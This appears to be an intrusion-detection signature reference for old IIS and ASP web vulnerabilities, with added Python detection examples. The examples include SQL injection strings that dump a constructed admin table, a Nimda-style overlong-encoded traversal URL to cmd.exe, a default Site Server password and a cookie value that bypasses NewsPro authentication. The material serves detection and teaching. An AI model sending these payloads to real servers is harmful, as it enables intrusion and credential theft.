Signature Description: Microsoft Internet Information Server (IIS) is a web server that ships with the Windows platform.
Microsoft IIS version 4.0 is vulnerable to a denial of service attack caused by a buffer overflow involving the way that
.HTR, .STM, and .IDC files are processed. IIS version 4.0 can perform various server-side processing with specific file
types. When a web site visitor requests a file of one of these types, an appropriate filter DLL processes it. By sending a
malformed request, an attacker can overflow a buffer and cause the service to crash or execute arbitrary code. Install
the update issued in Microsoft Security Bulletin MS99-019.
Signature ID: 1702
Microsoft IIS 4.0/5.0 Source Fragment Disclosure Vulnerability
Threat Level: Severe
Industry ID: CVE-2000-0630 CVE-2000-0457 Bugtraq: 1488,1193,189
Signature Description: Microsoft Internet Information Services (IIS) 4.0 and 5.0 are vulnerable to a source code
disclosure vulnerability. If '+.htr' is appended to a request for a known .asp (or .asa, .ini, etc.) file, the request will be
handled by ISM.DLL, which then strips the +.htr string and may disclose part or all of the source of the .asp file
specified in the request.
Signature ID: 1703
Microsoft IIS HTTP Header Field Delimiter Buffer Overflow Vulnerability
Threat Level: Warning
Industry ID: CVE-2002-0150 Bugtraq: 4476
Signature Description: Microsoft Internet Information Server (IIS) is vulnerable to a buffer overflow in the handling of
HTTP headers. An intruder could execute arbitrary code with privileges that vary according to which version of IIS is
running. IIS version 4.0 permits an intruder to execute code with complete administrative privileges, while IIS 5.0 and
5.1 permit an intruder to execute code with the privileges of the IWAM_computername account.
Signature ID: 1705
Microsoft IIS executable file parsing vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0886 Bugtraq: 1912
Signature Description: Microsoft Internet Information Services (IIS) can receive executable file requests, and valid
requests are sent to the operating system for processing. A vulnerability exists in IIS 4.0 and 5.0 whereby, when IIS
receives a specially formed request for an executable file followed by operating system commands, IIS will proceed to
process the entire string rather than rejecting it. An attacker can use this vulnerability to modify Web pages or other
files on the Web server, reformat the hard drive, or perform other unauthorized actions. For successful
exploitation, the file requested must be an existing .bat or .cmd file residing in a folder for which the user possesses
execute permissions.
Signature ID: 1710
Microsoft IIS HTR Chunked Encoding Transfer Heap Overflow Vulnerability
Threat Level: Information
Industry ID: CVE-2002-0364 Bugtraq: 4855
Signature Description: This rule gets hit when an attempt is made to exploit a buffer overflow associated with the chunked
encoding data transfer mechanism, which is part of the ISAPI (Internet Services Application Programming Interface)
extension that implements HTR functionality in Microsoft Internet Information Services (IIS). Chunked encoding is a
means to transfer variable-sized units of data (called chunks) from a web client to a web server. By sending a
specially-crafted "chunk" of data that causes an incorrect buffer size to be allocated, a remote attacker could overflow a buffer
and execute arbitrary code on the system or cause the IIS service to fail. Microsoft IIS 4.0 and 5.0 are vulnerable to this
issue.
Signature ID: 1711
WEB-IIS /StoreCSVS/InstantOrder.asmx request Vulnerability
Threat Level: Information
Signature Description: Microsoft IIS (Internet Information Server) is a group of Internet servers including a Hypertext
Transfer Protocol service and a File Transfer Protocol service. It was developed by Microsoft. InstantOrder.asmx
provides automated ordering services. This service exposes a programmatic interface that enables users to transfer new
orders from their web sites or Web-connected programs directly to the Commerce site. This rule will trigger when an
attacker attempts to access InstantOrder.asmx. Successful exploitation of this issue will allow an attacker to gain
information.
Signature ID: 1712
Microsoft IIS 4.0 samples directory access Vulnerability
Threat Level: Information
Industry ID: CVE-1999-0736 Bugtraq: 167 Nessus: 1007,10007
Signature Description: Microsoft IIS (Internet Information Server) is a group of Internet servers including a Web or
Hypertext Transfer Protocol server and a File Transfer Protocol server. It was developed by Microsoft. This rule gets
hit when an attempt is made to access the /msadc/samples directory under Microsoft IIS. A default installation of IIS 4.0
contains vulnerable scripts in the samples directory which may reveal the source code of IIS files. An attacker may use
this information in constructing further attacks.
Signature ID: 1713
EarlyImpact ProductCart SQL Injection Vulnerability
Threat Level: Information
Industry ID: CVE-2004-2173 CVE-2004-2174 Bugtraq: 8103,9669,9669 Nessus: 11785
Signature Description: EarlyImpact ProductCart is a shopping cart software to sell products and services online. This
rule gets hit when an attempt is made to access EarlyImpact ProductCart search scripts or login script. An SQL
Injection vulnerability exists in the search files advSearch_H.asp, advSearch_I.asp, advSearch_L.asp,
advSearch_M.asp, advSearch_P.asp and the customer login page custva.asp. All versions prior to 2.0 are affected.
Signature ID: 1715
Microsoft IIS 1.0 Directory traversal attempt Vulnerability
Threat Level: Information
Industry ID: CVE-1999-0229 Bugtraq: 2218
Signature Description: Microsoft Internet Information Server (IIS) is a web server that ships with the Windows platform.
This rule gets hit when an attempt is made to access a Microsoft Internet Information Service (IIS) 1.0 host with a
malformed request. IIS 1.0 servers are vulnerable to a denial of service attack when a malformed request containing
"..\.." is sent to the server. The service must be restarted to restore functionality.
Signature ID: 1716
Persits ASPUpload 2.1 DirectoryListing.asp access Vulnerability
Threat Level: Information
Industry ID: CVE-2001-0938 Bugtraq: 3608
Signature Description: This rule gets hit when an attempt is made to access DirectoryListing.asp via HTTP. Persits
ASPUpload is an Active Server component that allows users to upload files to ASP programs using a Web browser.
The sample script 'DirectoryListing.asp' which is installed by default allows a remote user to browse directories, and
download any file located on the server. Persits ASPUpload 2.1 is vulnerable.
Signature ID: 1719
Microsoft Data Access Components RDS Buffer Overflow Vulnerability
Threat Level: Information
Industry ID: CVE-2002-1142 Bugtraq: 6214
Signature Description: Microsoft Data Access Components (MDAC) is a collection of utilities and routines to process
requests between databases and network applications. A buffer overflow vulnerability exists in the Remote Data
Services (RDS) component of MDAC 2.1 through 2.6. The RDS component provides an intermediary step for a client's
request for service from a back-end database which enables the web site to apply business logic to the request. A
routine in the RDS component, specifically the RDS Data Stub function, contains an unchecked buffer. The RDS Data
Stub function's purpose is to parse incoming HTTP requests and generate RDS commands. This unchecked buffer
could be exploited to cause a heap overflow.
Signature ID: 1720
Microsoft Site Server 3.0 Default account login Vulnerability
Threat Level: Information
Industry ID: CVE-2002-1769 Bugtraq: 3998,4007 Nessus: 11018
Signature Description: Microsoft Site Server 3.0 for Windows NT servers allows users to publish, find, and share
information. By default, Microsoft Site Server version 3.0 prior to SP4 running on Windows NT 4.0 creates a user
account with a known password. The "LDAP_Anonymous" user account allows limited local login privileges and uses
the known password "LdapPassword_1". When an attacker logs on with the default user name and password, Site
Server reveals information about some Site Server files.
Signature ID: 1721
Microsoft WebProxy Service w3proxy.dll file access vulnerability
Threat Level: Information
Industry ID: CVE-2003-0110
Signature Description: A Web Proxy Server is a server which services the requests of its clients by forwarding requests to
other servers. Microsoft Proxy Server 2.0 is vulnerable. This rule tries to detect access to w3proxy.dll via an HTTP
request. The w3proxy.dll file is part of the ISAPI filter of the Web Proxy service. This is a vulnerable file and is associated
with a vulnerability (MS03-012). An attacker may scan the system to determine whether the targeted machine is
vulnerable by accessing the w3proxy.dll file.
Signature ID: 1722
Microsoft Windows ASN.1 Library Bit String Processing Vulnerability
Threat Level: Information
Industry ID: CVE-2003-0818 Bugtraq: 9635 Nessus: 12065,12052,12054,12055
Signature Description: Abstract Syntax Notation number One (ASN.1) is an international standard used to describe and
transmit data packets between applications and across networks. There is a buffer overflow vulnerability in the
Microsoft ASN.1 Library that could allow an unauthenticated, remote attacker to execute arbitrary code with SYSTEM
privileges on the affected system (MS04-007). This rule tries to detect scan attempts for this vulnerability. Affected
systems are Microsoft Windows NT 4.0, Microsoft Windows NT 4.0 TSE, Microsoft Windows 2000, Microsoft
Windows XP, and Microsoft Windows Server 2003.
Signature ID: 1723
NewsPro administration unauthorized authentication vulnerability
Threat Level: Information
Industry ID: CVE-2002-1734 Bugtraq: 4672
Signature Description: NewsPro is a freely available ASP script used to display and maintain news stories for Web
sites. There exists a vulnerability in NewsPro 1.01 that allows a remote attacker to gain unauthorized access to the
application. This vulnerability allows the attacker to set their authentication cookie to "logged,true" to gain
unauthorized administrator access to NewsPro. No remedy is available as of 2008.
Signature ID: 1724
Microsoft Windows SAM file access vulnerability
Threat Level: Information
Signature Description: This rule gets hit when an attempt is made to access the Windows Security Accounts Manager
(SAM) password file via a web request. The SAM password file contains Windows logins which are NTLM or
LANMAN hashes on Windows NT/2K/XP hosts. If an attacker can get the real SAM file and is able to gain clear text
passwords, the host can be compromised using the Administrator's login.
Signature ID: 1725
Microsoft SQL Server SQLXML contenttype Buffer Overflow Vulnerability
Threat Level: Information
Industry ID: CVE-2002-0186 Bugtraq: 5004
Signature Description: SQLXML is a component of SQL Server 2000 which enables SQL servers to receive and send
database queries in XML (Extensible Markup Language) format. IIS enables XML over HTTP using SQLXML HTTP
components, one of which is an ISAPI extension. The SQLXML ISAPI extension does not adequately validate the
length of the content-type parameter. As a result, an attacker could construct a URI with a specially crafted value for
content-type that triggers a buffer overflow on a vulnerable IIS server. An IIS server is only vulnerable if SQLXML is
enabled and configured to run over HTTP. Affected platforms are Microsoft SQL Server 2000, Microsoft SQL Server
2000 Gold, Microsoft SQLXML 2, Microsoft SQLXML 3, Microsoft Windows 2003 Server, and Microsoft Windows
XP Professional.
Signature ID: 1726
SmarterTools SmarterMail frmCompose.aspx file access Vulnerability
Threat Level: Information
Industry ID: CVE-2004-2585 Bugtraq: 9805
Signature Description: SmarterTools SmarterMail is a mail server application for Microsoft Windows. SmarterMail 1.61 is
vulnerable to a cross-site scripting attack in the page frmCompose.aspx, caused by insufficient sanitization of
user-supplied data in the spell check function. Successful exploitation allows an attacker to steal cookie-based
authentication credentials on the vulnerable system. This vulnerability is fixed in SmarterMail 1.62; administrators are
advised to update to SmarterMail 1.62 or later to resolve this issue.
Signature ID: 1727
SmarterTools SmarterMail frmGetAttachment.aspx Information Disclosure vulnerability
Threat Level: Information
Industry ID: CVE-2004-2586
Signature Description: SmarterTools SmarterMail is a mail server application for Microsoft Windows. SmarterMail
1.6.1511 and 1.6.1529 are vulnerable to a directory traversal in the file frmGetAttachment.aspx, caused by insufficient
sanitization of user-supplied data. Successful exploitation allows a malicious user to read any file on the system, which
is an information disclosure rather than command execution.
Signature ID: 1728
SmarterTools SmarterMail login.aspx Buffer Overflow Vulnerability
Threat Level: Information
Industry ID: CVE-2004-2587
Signature Description: SmarterTools SmarterMail is a mail server application for Microsoft Windows. SmarterMail
1.6.1511 and 1.6.1529 use the file login.aspx to authenticate users. login.aspx accepts a POST request whose
txtusername parameter is prone to a buffer overflow: a string of more than 980 characters overflows the buffer, and an
attacker can exploit this to execute arbitrary code.
Signature ID: 1729
HTTP Error 403 - Forbidden response from Webserver vulnerability
Threat Level: Information
Signature Description: HTTP (HyperText Transfer Protocol) is the protocol used by the World Wide Web to transfer files
(text, graphics, images, sound, video and other multimedia content). This rule triggers when the web server answers a
client request with a "403 Forbidden" response; a run of such responses from one client can indicate probing for
restricted resources. A 403 is also returned, for example, when a request for a URL ending in '/' is made to a directory
for which browsing is disabled.
Signature ID: 1730
WEB-IIS UploadScript11.asp access Vulnerability
Threat Level: Information
Industry ID: CVE-2001-0938 Bugtraq: 3608 Nessus: 11746
Signature Description: AspUpload is an ASP extension that allows remote users to upload files through an HTML form.
AspUpload (version 2.1) receives the uploaded streams and saves them on the server as files. It creates sample scripts
(such as UploadScript11.asp) during installation. A remote attacker can exploit this vulnerability to upload and read
arbitrary files, and list arbitrary directories, via a '..' (dot dot) in the filename parameter of UploadScript11.asp or
DirectoryListing.asp. No remedy available as of July 2008.
Signature ID: 1731
Virtual Programming VP-ASP shopdisplayproducts.asp SQL injection vulnerability
Threat Level: Severe
Bugtraq: 9134 Nessus: 11942
Signature Description: Virtual Programming VP-ASP is a shopping cart application written in ASP that supports
MS-ACCESS, MySQL and MSSQL databases. The script shopdisplayproducts.asp in VP-ASP is vulnerable to a SQL
injection attack that allows an attacker to gain administrative access to the installed VP-ASP Shopping Cart software or
execute arbitrary commands on the target system. Affected platform is Rocksalt International VP-ASP 5.00.
Signature ID: 1732
Virtual Programming VP-ASP shopsearch.asp SQL injection vulnerability
Threat Level: Severe
Bugtraq: 9134 Nessus: 11942
Signature Description: Virtual Programming VP-ASP is a shopping cart application written in ASP that supports
MS-ACCESS, MySQL and MSSQL databases. The script shopsearch.asp in VP-ASP is vulnerable to a SQL injection
attack that allows an attacker to gain administrative access to the installed VP-ASP Shopping Cart software or execute
arbitrary commands on the target system. Vulnerable platforms are VP-ASP 4.0 and 5.0.
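Signatures 1731 and 1732 both describe the same defect: a request parameter spliced into SQL text. The following added example (not code from the original guide or from VP-ASP) reproduces it against a constructed in-memory SQLite catalogue and places the parameterized query beside it. The table layout, column names and the `category` parameter are assumptions made for the demonstration, not VP-ASP's actual schema.

```python
import sqlite3


def setup_db() -> sqlite3.Connection:
    """Constructed catalogue standing in for a shopping-cart database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (catalogid INTEGER, ccategory TEXT, cname TEXT, hidden INTEGER);
        INSERT INTO products VALUES (1, 'Books', 'Public book', 0);
        INSERT INTO products VALUES (2, 'Books', 'Hidden item', 1);
        CREATE TABLE admins (username TEXT, password TEXT);
        INSERT INTO admins VALUES ('admin', 'constructed-secret');
    """)
    return conn


def products_vulnerable(conn: sqlite3.Connection, category: str) -> list:
    """String concatenation: the request parameter becomes part of the SQL.

    A value such as  ' OR '1'='1  turns the WHERE clause into a tautology, and a
    UNION payload pulls rows from a table the page was never meant to expose."""
    sql = ("SELECT cname FROM products WHERE hidden = 0 AND ccategory = '"
           + category + "'")
    return [row[0] for row in conn.execute(sql)]


def products_safe(conn: sqlite3.Connection, category: str) -> list:
    """Bound parameter: the value is data and can never alter the statement."""
    sql = "SELECT cname FROM products WHERE hidden = 0 AND ccategory = ?"
    return [row[0] for row in conn.execute(sql, (category,))]


if __name__ == "__main__":
    db = setup_db()
    tautology = "' OR '1'='1"
    union = "' UNION SELECT username || ':' || password FROM admins WHERE 'a'='a"
    print("vulnerable, tautology:", products_vulnerable(db, tautology))
    print("vulnerable, union:    ", products_vulnerable(db, union))
    print("safe, tautology:      ", products_safe(db, tautology))
    print("safe, normal input:   ", products_safe(db, "Books"))
```

The UNION payload is how a SQL injection in a product listing turns into "administrative access": the credentials table is read through the same page that shows products.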
Signature ID: 1733
Microsoft Windows ntdll.dll Buffer Overflow with IIS WebDAV request vulnerability
Threat Level: Information
Industry ID: CVE-2003-0109 Bugtraq: 7116 Nessus: 11413,11412
Signature Description: Microsoft Windows contains ntdll.dll which is a core operating system component used to
interact with the Windows kernel. A buffer overflow vulnerability exists in ntdll.dll and this can be exploited by using
WebDAV component of Microsoft IIS. The IIS WebDAV component utilizes ntdll.dll when processing incoming
WebDAV requests. By sending a specially crafted WebDAV request to an IIS 5.0 server, an attacker may be able to
execute arbitrary code in the Local System security context, essentially giving the attacker complete control of the
system. Many other applications that can make use of ntdll.dll can also exploit this vulnerability. This rule looks for
exploitation of this vulnerability by a specially crafted WebDAV request to IIS server.
Signature ID: 1734
Microsoft Windows ntdll.dll Buffer Overflow with IIS WebDAV request vulnerability
Threat Level: Information
Industry ID: CVE-2003-0109 Bugtraq: 7116 Nessus: 11413,11412
Signature Description: Microsoft Windows contains ntdll.dll which is a core operating system component used to
interact with the Windows kernel. A buffer overflow vulnerability exists in ntdll.dll and this can be exploited by using
WebDAV component of Microsoft IIS. The IIS WebDAV component utilizes ntdll.dll when processing incoming
WebDAV requests. By sending a specially crafted WebDAV request to an IIS 5.0 server, an attacker may be able to
execute arbitrary code in the Local System security context, essentially giving the attacker complete control of the
system. Many other applications that can make use of ntdll.dll can also exploit this vulnerability. This rule looks for
exploitation of this vulnerability by a specially crafted WebDAV request to an IIS server. This signature triggers when a
WebDAV SEARCH request carries a Host header value longer than 255 characters.
Signature ID: 1735
Microsoft IIS Extensions WebDAV LOCK method Denial of Service Vulnerability
Threat Level: Information
Industry ID: CVE-2001-0337 Bugtraq: 2736
Signature Description: WebDAV extensions are used by administrators to manage and edit Web content remotely in
Microsoft Internet Information Services. The WebDav extensions (httpext.dll) for Internet Information Server 5.0
contain a flaw that could allow a malicious user to consume all available memory on the server. The server will run out
of memory and crashes if requests for non-existent files are sent with the LOCK method. Apply the appropriate patch, as
listed in Microsoft security bulletins MS01-014 and MS01-016.
Signature ID: 1736
Microsoft Site Server _mem_bin directory access Vulnerability
Threat Level: Information
Nessus: 11032
Signature Description: Microsoft Site Server 3.0 for Windows NT servers allows users to publish, find, and share
information. This rule generates an event when an attacker tries to access the _mem_bin directory of Site Server 3.0. The
Site Server installation places a few ASPs and DLLs in the _mem_bin directory under \wwwroot\. Some ASP pages in
this directory reveal the default LDAP schema, including host and port.
Signature ID: 1738
Microsoft IIS 4.0 IISADMPWD Proxied Password Vulnerability
Threat Level: Information
Industry ID: CVE-1999-0407 Bugtraq: 2110
Signature Description: This rule triggers when an attempt is made to request an HTTP-based password change via
an anot*.htr file. Microsoft Internet Information Services (IIS) version 4 provides a feature that allows users to change
passwords remotely. The iisadmpwd directory contains several .HTR files (achg.htr, aexp*.htr and anot*.htr) that
implement the password change. An attacker can request a change and use the returned form to supply an account name,
existing password and new password, either to brute-force changes or to discover whether a specific account name exists.
Signature ID: 1739
AskSam Web Publisher as_web.exe Cross Site Scripting Vulnerability
Threat Level: Severe
Industry ID: CVE-2002-1727 Bugtraq: 4670
Signature Description: AskSam Web Publisher is a tool for publishing documents and databases to the Web. askSam
Web Publisher (as_web.exe) versions 1 and 4 are vulnerable to cross-site scripting. A remote attacker could attach
malicious JavaScript as a user-supplied variable in a URL request to as_web.exe or as_web4.exe, which would be
executed in the victim's Web browser once the link is clicked. This rule triggers when a request for as_web.exe is
followed by a script tag.
Signature ID: 1740
AskSam Web Publisher as_web4.exe Cross Site Scripting Vulnerability
Threat Level: Severe
Industry ID: CVE-2002-1727 Bugtraq: 4670
Signature Description: AskSam Web Publisher is a tool for publishing documents and databases to the Web. askSam
Web Publisher (as_web.exe) versions 1 and 4 are vulnerable to cross-site scripting. A remote attacker could attach
malicious JavaScript as a user-supplied variable in a URL request to as_web.exe or as_web4.exe, which would be
executed in the victim's Web browser once the link is clicked. This rule triggers when "as_web4.exe" followed by a script
tag appears in the URI content.
Signature ID: 1741
Microsoft IIS Appended Dot Script Source Disclosure Vulnerability
Threat Level: Warning
Industry ID: CVE-1999-0253 Bugtraq: 2074,1814
Signature Description: Microsoft IIS(Internet Information Server) is a group of Internet servers including a Web or
Hypertext Transfer Protocol server and a File Transfer Protocol server. It was developed by Microsoft. Microsoft IIS
2.0 and 3.0 suffer from an issue allowing a remote user to retrieve the source code for any script (that has read
permissions on the server) via a web browser. This is accomplished by appending a period (.) to the end of a URL
requesting a specific script, and applies to any file types in the "script-map list", including .asp, .ht., .id, .PL, and others.
Consequences of exploitation vary depending on the site design, but commonly include details of directory structure on
the web server, database passwords, and various other pieces of information that could then be used to mount further
attacks. Upgrade to the latest version of IIS(4.0 or later), available at vendor's website.
Signature ID: 1742
WEB-IIS asp-srch Vulnerability
Threat Level: Severe
Signature Description: Microsoft IIS(Internet Information Server) is a group of Internet servers including Hypertext
Transfer Protocol service and a File Transfer Protocol service. It was developed by Microsoft. This rule attempts to
detect the string ".asp" in the content of a request to a web server running IIS. Successful exploitation of this
issue allows an attacker to gain information on the IIS implementation on the host.
Signature ID: 1743
Access to cmd32.exe Vulnerability
Threat Level: Warning
Signature Description: This rule triggers when an attempt is made to access the file cmd32.exe. This file is only
accessible if it was maliciously placed in the web server's root directory or an attacker performs unauthorized directory
traversal. This may permit the attacker to execute arbitrary commands on the vulnerable server.
Signature ID: 1744
Microsoft IIS .cmd?& Access Vulnerability
Threat Level: Severe
Signature Description: Microsoft IIS(Internet Information Server) is a group of Internet servers including Hypertext
Transfer Protocol service and a File Transfer Protocol service. It was developed by Microsoft. This rule triggers when
the string ".cmd?&" is found in content while accessing a web server running IIS. Successful exploitation of this issue
allows an attacker to gain information on the IIS implementation of the host, which may be the prelude to an attack
against that host using that information.
Signature ID: 1746
Microsoft IIS Form_VBScript.asp XSS Vulnerability
Threat Level: Severe
Industry ID: CVE-2000-1104 CVE-2000-0746 Bugtraq: 1595,1594 Nessus: 10572
Signature Description: Microsoft IIS contains a flaw that allows a remote cross site scripting attack. This flaw exists
because the application does not validate input upon submission to the "Form_VBScript.asp" script. This could allow a
user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship
between the browser and the server, leading to loss of integrity. Vulnerable Platforms are Microsoft IIS 4.0 and 5.0.
Signature ID: 1747
WEB-Microsoft IIS FTP del attempt Vulnerability
Threat Level: Severe
Industry ID: CVE-1999-0777 Bugtraq: 658
Signature Description: Microsoft IIS(Internet Information Server) is a group of Internet servers including Hypertext
Transfer Protocol service and a File Transfer Protocol service. It was developed by Microsoft. IIS allows users to delete
files on the server by using the del command. Microsoft IIS 4.0 and Microsoft Commercial Internet System 2.5 are
vulnerable. This rule generates an event when a del command is sent to the HTTP server.
Signature ID: 1748
Microsoft Front Page file doctodep.btr access Vulnerability
Threat Level: Information
Signature Description: Microsoft FrontPage is a HTML editor and web site administration tool from Microsoft for
Windows. Front Page Server Extensions allows Microsoft FrontPage clients to communicate with web servers, and
provide additional functionality intended for websites. This rule triggers when an attacker attempts to access the
Microsoft FrontPage file doctodep.btr. Doctodep.btr is a dependency database for the web and can sometimes contain
fragments of server-side code.
Signature ID: 1749
Microsoft IIS Escape Character Parsing Vulnerability
Threat Level: Information
Industry ID: CVE-2000-0024 Bugtraq: 886
Signature Description: Microsoft Internet Information Server (IIS) contains a potentially exploitable vulnerability that
could allow attackers to bypass the security of third-party applications running atop IIS. Special and unprintable
characters are represented in URLs as hexadecimal escapes preceded by the '%' character. Some invalid hexadecimal
characters (characters other than 0-9 or a-f) could be interpreted as valid ASCII characters and could be used to subvert
access controls in some applications. Vulnerable Platforms are Microsoft Site Server Commerce Edition 3.0, Microsoft
IIS 4.0
Signature ID: 1750
WEB-IIS exec-src access Vulnerability
Threat Level: Information
Signature Description: Microsoft IIS(Internet Information Server) is a group of Internet servers including Hypertext
Transfer Protocol service and a File Transfer Protocol service. It was developed by Microsoft. This rule attempts to
detect the string ".exe" in the content of a request to a web server running IIS. Successful exploitation of this
issue allows an attacker to gain information on the IIS implementation on the host.
Signature ID: 1751
FoxWeb PATH_INFO Remote Buffer Overrun Vulnerability
Threat Level: Severe
Industry ID: CVE-2003-0762 Bugtraq: 8547 Nessus: 11939
Signature Description: FoxWeb is a tool used to create interactive Web applications for Microsoft Windows operating
systems. FoxWeb version 2.5 is vulnerable to a stack-based buffer overflow in the foxweb.dll scripts. By supplying an
overly long URL string to the PATH_INFO variable (over 3000 bytes) in the foxweb.dll script, a remote attacker could
overflow a buffer and execute arbitrary code on the system. No remedy available as of August 2008.
Signature ID: 1752
FoxWeb PATH_INFO Remote Buffer Overrun Vulnerability
Threat Level: Severe
Industry ID: CVE-2003-0762 Bugtraq: 8547 Nessus: 11939
Signature Description: FoxWeb is a tool used to create interactive Web applications for Microsoft Windows operating
systems. FoxWeb version 2.5 is vulnerable to a stack-based buffer overflow in the foxweb.exe script. By supplying an
overly long string to the PATH_INFO variable (over 3000 bytes) in the foxweb.exe script, a remote attacker could
overflow a buffer and execute arbitrary code on the system. No remedy available as of August 2008.
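Signatures 1728 (txtusername longer than 980 characters in a POST to login.aspx), 1734 (a SEARCH request with a Host header longer than 255 characters) and 1751/1752 (PATH_INFO after foxweb.dll or foxweb.exe longer than 3000 bytes) are all length-threshold rules on one field of an HTTP request. The following added example (not code from the original guide or from the TMS module) parses a raw request and applies those three thresholds. The sample requests are constructed for the demonstration; the signature IDs returned are the guide's, the thresholds and field names are taken from the descriptions above.

```python
from urllib.parse import parse_qs, urlsplit


def parse_request(raw: bytes):
    """Split a raw HTTP/1.x request into (method, target, headers, body).

    Header names are lower-cased so lookups are case-insensitive."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def path_info(path: str, script: str) -> str:
    """Portion of the URL path after the named script, i.e. CGI PATH_INFO."""
    idx = path.lower().find(script)
    return path[idx + len(script):] if idx >= 0 else ""


def check_request(raw: bytes) -> list:
    """Return the signature IDs whose length threshold the request exceeds."""
    method, target, headers, body = parse_request(raw)
    path = urlsplit(target).path
    hits = []
    # 1734: WebDAV SEARCH with an oversized Host header.
    if method.upper() == "SEARCH" and len(headers.get("host", "")) > 255:
        hits.append(1734)
    # 1728: POST to login.aspx whose txtusername exceeds 980 characters.
    if method.upper() == "POST" and path.lower().endswith("/login.aspx"):
        form = parse_qs(body.decode("latin-1"), keep_blank_values=True)
        if any(len(v) > 980 for v in form.get("txtusername", [])):
            hits.append(1728)
    # 1751/1752: FoxWeb PATH_INFO longer than 3000 bytes.
    for script, sid in (("foxweb.dll", 1751), ("foxweb.exe", 1752)):
        if len(path_info(path, script).encode("latin-1")) > 3000:
            hits.append(sid)
    return hits


# Constructed sample traffic (not captured data).
SEARCH_REQ = (b"SEARCH / HTTP/1.1\r\nHost: " + b"A" * 300
              + b"\r\nContent-Length: 0\r\n\r\n")
LOGIN_REQ = (b"POST /login.aspx HTTP/1.1\r\nHost: mail.example.test\r\n"
             b"Content-Type: application/x-www-form-urlencoded\r\n\r\n"
             b"txtusername=" + b"A" * 1000 + b"&txtpassword=x")
FOXWEB_REQ = (b"GET /foxweb.dll/" + b"A" * 3100
              + b" HTTP/1.0\r\nHost: www.example.test\r\n\r\n")
BENIGN_REQ = b"GET /index.html HTTP/1.1\r\nHost: www.example.test\r\n\r\n"

if __name__ == "__main__":
    for name, req in (("SEARCH", SEARCH_REQ), ("login", LOGIN_REQ),
                      ("foxweb", FOXWEB_REQ), ("benign", BENIGN_REQ)):
        print(f"{name:7s} -> {check_request(req)}")
```

Measuring the decoded field rather than the raw wire bytes matters: a threshold applied before percent-decoding can be dodged by encoding the payload, and one applied to the whole request line fires on long but harmless query strings.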
Signature ID: 1753
WEB-IIS getdrvs.exe access Vulnerability
Threat Level: Information
Signature Description: Microsoft IIS(Internet Information Server) is a group of Internet servers including Hypertext
Transfer Protocol service and a File Transfer Protocol service. It was developed by Microsoft. This rule triggers
when an attacker attempts to access the getdrvs.exe file. Successful exploitation of this issue allows a remote
attacker to disclose sensitive information.
Signature ID: 1754
Nimda Worm httpodbc.dll (cool.dll) file access Vulnerability
Threat Level: Severe
Industry ID: CVE-2001-0333 Bugtraq: 2708
Signature Description: Nimda worm uses the Unicode Web Traversal exploit to infect unpatched Microsoft IIS (4.0
and 5.0)web servers. On these web servers, it is possible to construct a URL that would cause the IIS to navigate to any
desired folder on the logical drive that contains the Web folder structure, and then access files in it. Successful
exploitation of the Directory Traversal Vulnerability gives the attacker the ability to install and run code, as well as
add, change, or delete files or Web pages on the compromised server. Apply the appropriate patch, as listed in
Microsoft Security Bulletin MS01-041, MS01-044, MS02-001, or MS02-018.
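Several of the signatures above hinge on how a request path is decoded before it is checked: the '..' in the filename parameter of the AspUpload sample scripts (1730), a cmd32.exe request (1743), hexadecimal escapes whose digits are not valid hex (1749), and the Nimda traversal that hides '/' inside an overlong UTF-8 sequence (1754). The following added example (not code from the original guide or from the TMS module) decodes a request target the way a lenient server would, flags malformed escapes instead of silently repairing them, and only then looks for traversal. The `%c0%af` sequence is the publicly documented overlong encoding of '/' used by the IIS Unicode traversal bug, not something stated on this page; the lenient two-byte decoder models the bug's accepting behaviour but is not IIS's code, and the sample URLs are constructed.

```python
import string
from urllib.parse import parse_qs, urlsplit


def percent_decode(path: str):
    """Decode %XX escapes to raw bytes.

    Returns (raw_bytes, had_invalid_escape).  A '%' not followed by two hex
    digits is kept literally and flagged, which is the malformed-escape case
    signature 1749 is about; a filter must not guess what the server will do."""
    out = bytearray()
    invalid = False
    i = 0
    while i < len(path):
        if path[i] == "%":
            pair = path[i + 1:i + 3]
            if len(pair) == 2 and all(c in string.hexdigits for c in pair):
                out.append(int(pair, 16))
                i += 3
                continue
            invalid = True
        out += path[i].encode("latin-1")
        i += 1
    return bytes(out), invalid


def lenient_utf8(data: bytes) -> str:
    """Decode two-byte UTF-8 sequences without rejecting overlong forms.

    A conformant decoder refuses lead bytes 0xC0/0xC1 because the result is an
    ASCII character that should have been one byte; the vulnerable IIS decoder
    accepted them, so 0xC0 0xAF became '/'.  Other bytes pass through as Latin-1."""
    out = []
    i = 0
    while i < len(data):
        b0 = data[i]
        if 0xC0 <= b0 <= 0xDF and i + 1 < len(data) and 0x80 <= data[i + 1] <= 0xBF:
            out.append(chr(((b0 & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(b0))
            i += 1
    return "".join(out)


def normalized_segments(path: str):
    """Decode as the target would and split into path segments."""
    raw, invalid = percent_decode(path)
    overlong = any(b in (0xC0, 0xC1) for b in raw)  # never valid UTF-8 lead bytes
    decoded = lenient_utf8(raw).replace("\\", "/")
    return decoded.split("/"), invalid, overlong


def check_uri(target: str):
    """Return (signature IDs hit, normalized path) for one request target."""
    parts = urlsplit(target)
    segments, invalid, overlong = normalized_segments(parts.path)
    hits = []
    if invalid:
        hits.append(1749)
    if ".." in segments and overlong:
        hits.append(1754)
    script = segments[-1].lower()
    # AspUpload sample scripts with '..' in their filename parameter.
    if script in ("uploadscript11.asp", "directorylisting.asp"):
        query = parse_qs(parts.query, keep_blank_values=True)
        if any(".." in v for v in query.get("filename", [])):
            hits.append(1730)
    if script == "cmd32.exe":
        hits.append(1743)
    return hits, "/".join(segments)


if __name__ == "__main__":
    for url in ("/scripts/..%c0%af../winnt/system32/cmd.exe",
                "/aspupload/UploadScript11.asp?filename=../../boot.ini",
                "/private/%2G../secret",
                "/scripts/cmd32.exe?/c+dir",
                "/index.html"):
        print(url, "->", check_uri(url))
```

The order of operations is the point: checking for '..' on the raw string misses the Nimda request entirely, because the traversal only appears after the overlong sequence is decoded.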
Signature ID: 1755
